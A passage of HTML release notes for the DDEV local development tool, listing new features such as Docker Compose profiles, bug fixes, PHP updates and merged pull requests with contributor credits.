<li><a href="https://marketplace.visualstudio.com/items?itemName=damms005.devdb" rel="nofollow">DevDb VS Code extension</a>: First class support for DDEV, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a></li>
</ul>
<h2>Features:</h2>
<ul>
<li>Optional <a href="https://docs.docker.com/compose/how-tos/profiles/" rel="nofollow">Docker Compose profiles</a>: You can now start projects with specific profiles using <code>ddev start --profiles=list,of,profiles</code></li>
<li>Backdrop: a new quickstart based on the official add-on, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a></li>
<li>New <a href="https://ddev.readthedocs.io/en/stable/users/extend/custom-commands/#mutagensync-annotation" rel="nofollow"><code>MutagenSync</code> annotation</a>: Custom commands that alter the host system can now use this annotation to help synchronize changes.</li>
</ul>
<h2>Bug Fixes:</h2>
<ul>
<li>DDEV router now works properly behind proxies (regression from v1.24.0).</li>
<li>Show router URLs in <code>ddev describe</code> and <code>ddev list</code> when default 80/443 port is busy (regression from v1.24.3).</li>
<li>Correct status color formatting in <code>ddev describe</code> and <code>ddev list</code>.</li>
<li>Remove outdated Traefik images with <code>ddev delete images</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Resolve misleading errors in <code>ddev debug test</code> when run outside the project root.</li>
<li>Fix invalid <code>upload_dirs</code> on traditional Windows setups.</li>
<li>Sanitize <code>~/.ddev/project_list.yaml</code> to prevent panic.</li>
<li>Make the <code>DDEV_PAGER</code> environment variable optional to prevent it from breaking <code>wp-cli</code> output.</li>
<li>Prevent overwriting the <code>generic</code> project type when running <code>ddev config --update</code>.</li>
<li>Update <code>DATABASE_URL</code> to use <code>charset=utf8mb4</code> in MySQL and MariaDB for Symfony projects, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a></li>
<li>Delete third-party built images on <code>ddev delete</code>.</li>
</ul>
<h2>Minor Updates:</h2>
<ul>
<li>PHP 8.3.19 and 8.4.5</li>
<li>Fix displaying for <code>#ddev-description</code> stanza in add-on install actions, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a></li>
<li>Show custom <code>config.*.yaml</code> on <code>ddev start</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a></li>
<li>Laravel 12 quickstart with tests.</li>
<li>Update DDEV brand logos for dark theme.</li>
<li>Update all Go vendor dependencies.</li>
<li>Add quickstart tests for Magento 2, CakePHP, ExpressionEngine, Kirby CMS, Symfony, Silverstripe CMS, CraftCMS, and Statamic, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Add OpenMage/Magento 1 quickstart test and split it from Magento 2, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix: the <code>#ddev-description</code> stanza in add-on install actions not showing if it's the first line by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881505677" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7022" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7022/hovercard" href="https://github.com/ddev/ddev/pull/7022">#7022</a></li>
<li>feat: add <code>go-version</code> to <code>ddev version</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881488018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7021" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7021/hovercard" href="https://github.com/ddev/ddev/issues/7021">#7021</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881994383" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7023" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7023/hovercard" href="https://github.com/ddev/ddev/pull/7023">#7023</a></li>
<li>feat: Add live link to Discord by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2890119688" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7042" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7042/hovercard" href="https://github.com/ddev/ddev/pull/7042">#7042</a></li>
<li>docs: remove the recommendation not to use colima by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883038685" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7025" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7025/hovercard" href="https://github.com/ddev/ddev/pull/7025">#7025</a></li>
<li>build: fix new mkdocs failure on git by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2895573083" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7046" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7046/hovercard" href="https://github.com/ddev/ddev/pull/7046">#7046</a></li>
<li>refactor: use <code>ddev composer create-project</code> in the code, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2800339972" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6920" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6920/hovercard" href="https://github.com/ddev/ddev/issues/6920">#6920</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883058777" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7027" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7027/hovercard" href="https://github.com/ddev/ddev/pull/7027">#7027</a></li>
<li>feat: Laravel 12 quickstart with tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2884083942" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7028" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7028/hovercard" href="https://github.com/ddev/ddev/pull/7028">#7028</a></li>
<li>fix: delete traefik images based on the pattern used for ddev-dbserver and use constants for targeting, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2362011554" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6326/hovercard" href="https://github.com/ddev/ddev/issues/6326">#6326</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2887734688" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7036" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7036/hovercard" href="https://github.com/ddev/ddev/pull/7036">#7036</a></li>
<li>feat: Support docker compose optional profiles, allow <code>ddev start --profiles=list,of,profiles</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2784687344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6894" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6894/hovercard" href="https://github.com/ddev/ddev/issues/6894">#6894</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2863727333" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7007" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7007/hovercard" href="https://github.com/ddev/ddev/pull/7007">#7007</a></li>
<li>fix: explicitly ping 127.0.0.1 in Traefik healthcheck to make proxying work, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2892968812" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7044" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7044/hovercard" href="https://github.com/ddev/ddev/issues/7044">#7044</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2804738825" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6931" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6931/hovercard" href="https://github.com/ddev/ddev/issues/6931">#6931</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2893855425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7045" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7045/hovercard" href="https://github.com/ddev/ddev/pull/7045">#7045</a></li>
<li>fix: remove refreshenv from WSL2 install scripts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2882448438" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7024" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7024/hovercard" href="https://github.com/ddev/ddev/issues/7024">#7024</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883049861" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7026" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7026/hovercard" href="https://github.com/ddev/ddev/pull/7026">#7026</a></li>
<li>docs: add Backdrop-specific config considerations. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2888045401" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7037" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7037/hovercard" href="https://github.com/ddev/ddev/pull/7037">#7037</a></li>
<li>build: don't use go 1.24 yet until docker issues resolved, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900544655" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7051" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7051/hovercard" href="https://github.com/ddev/ddev/issues/7051">#7051</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901680865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7057" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7057/hovercard" href="https://github.com/ddev/ddev/pull/7057">#7057</a></li>
<li>test: Run quickstart tests with mutagen enabled [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2876193317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7017" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7017/hovercard" href="https://github.com/ddev/ddev/pull/7017">#7017</a></li>
<li>docs: Improve troubleshooting docs for hosting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901596832" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7056" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7056/hovercard" href="https://github.com/ddev/ddev/pull/7056">#7056</a></li>
<li>build: skip testing with buildkite if diff is not from that branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2910419890" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7064" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7064/hovercard" href="https://github.com/ddev/ddev/pull/7064">#7064</a></li>
<li>docs: update mkdocs logo, update word/figurative mark svg for dark mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901286445" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7055" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7055/hovercard" href="https://github.com/ddev/ddev/pull/7055">#7055</a></li>
<li>build: put both git and ssh in both webserver images, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900929934" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7054" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7054/hovercard" href="https://github.com/ddev/ddev/issues/7054">#7054</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2908485234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7063" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7063/hovercard" href="https://github.com/ddev/ddev/pull/7063">#7063</a></li>
<li>build: Use specific binfmt for qemu in push-tagged-image [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914447280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7070" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7070/hovercard" href="https://github.com/ddev/ddev/pull/7070">#7070</a></li>
<li>build: use special qemu binfmt version for db push [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915179691" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7073" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7073/hovercard" href="https://github.com/ddev/ddev/pull/7073">#7073</a></li>
<li>fix: add check for app in <code>ddev debug test</code> and run it from approot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915048403" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7072" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7072/hovercard" href="https://github.com/ddev/ddev/pull/7072">#7072</a></li>
<li>build: Update go mod files except docker, replaces <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915548957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7074" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7074/hovercard" href="https://github.com/ddev/ddev/pull/7074">#7074</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918653984" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7078/hovercard" href="https://github.com/ddev/ddev/pull/7078">#7078</a></li>
<li>test: don't load 1password secrets if not available [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920352693" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7088" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7088/hovercard" href="https://github.com/ddev/ddev/pull/7088">#7088</a></li>
<li>test: Fix secret loading [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920995846" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7090" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7090/hovercard" href="https://github.com/ddev/ddev/pull/7090">#7090</a></li>
<li>build: upgrade docker/docker to v28 usages, followup to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918653984" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7078/hovercard" href="https://github.com/ddev/ddev/pull/7078">#7078</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918656767" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7079" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7079/hovercard" href="https://github.com/ddev/ddev/issues/7079">#7079</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918727491" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7081" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7081/hovercard" href="https://github.com/ddev/ddev/pull/7081">#7081</a></li>
<li>docs: Fix pull request title link in pull request template [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923104508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7097" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7097/hovercard" href="https://github.com/ddev/ddev/pull/7097">#7097</a></li>
<li>test: Add quickstart test for magento2 (by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a>) [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918940304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7082" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7082/hovercard" href="https://github.com/ddev/ddev/pull/7082">#7082</a></li>
<li>test: Disable link check on freedesktop.org since it will be out for a week by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923207366" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7100" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7100/hovercard" href="https://github.com/ddev/ddev/pull/7100">#7100</a></li>
<li>docs: add Wordpress special handling info about wp-cli.yml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918705956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7080/hovercard" href="https://github.com/ddev/ddev/pull/7080">#7080</a></li>
<li>docs: add DevDb tip to database management documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2919875466" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7084" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7084/hovercard" href="https://github.com/ddev/ddev/pull/7084">#7084</a></li>
<li>docs: update Windows installation docs to use 'Docker Engine' terminology by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nick-Hope/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nick-Hope">@Nick-Hope</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2921781585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7092" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7092/hovercard" href="https://github.com/ddev/ddev/pull/7092">#7092</a></li>
<li>fix: use filepath for calculateHostUploadDirFullPath, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2910964061" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7065" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7065/hovercard" href="https://github.com/ddev/ddev/issues/7065">#7065</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2912465334" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7066" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7066/hovercard" href="https://github.com/ddev/ddev/pull/7066">#7066</a></li>
<li>test: simplify the zip based test and quickstart for backdrop based on feedback from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925024940" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7106" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7106/hovercard" href="https://github.com/ddev/ddev/pull/7106">#7106</a></li>
<li>test: use a more robust approach downloading the latest zip file (by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2924915077" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7104" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7104/hovercard" href="https://github.com/ddev/ddev/pull/7104">#7104</a></li>
<li>test: Bats test for CakePHP composer quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923408905" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7103" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7103/hovercard" href="https://github.com/ddev/ddev/pull/7103">#7103</a></li>
<li>test: bats tests for expression engine and adjustments to its quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923236029" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7101" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7101/hovercard" href="https://github.com/ddev/ddev/pull/7101">#7101</a></li>
<li>test: adding kirby quickstart bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923175418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7099" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7099/hovercard" href="https://github.com/ddev/ddev/pull/7099">#7099</a></li>
<li>fix: remove obsolete references to non-traefik router by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923103239" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7096" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7096/hovercard" href="https://github.com/ddev/ddev/pull/7096">#7096</a></li>
<li>fix: add ddev_nointeractive to common-setup.bash (per <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926865151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7115" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7115/hovercard" href="https://github.com/ddev/ddev/pull/7115">#7115</a></li>
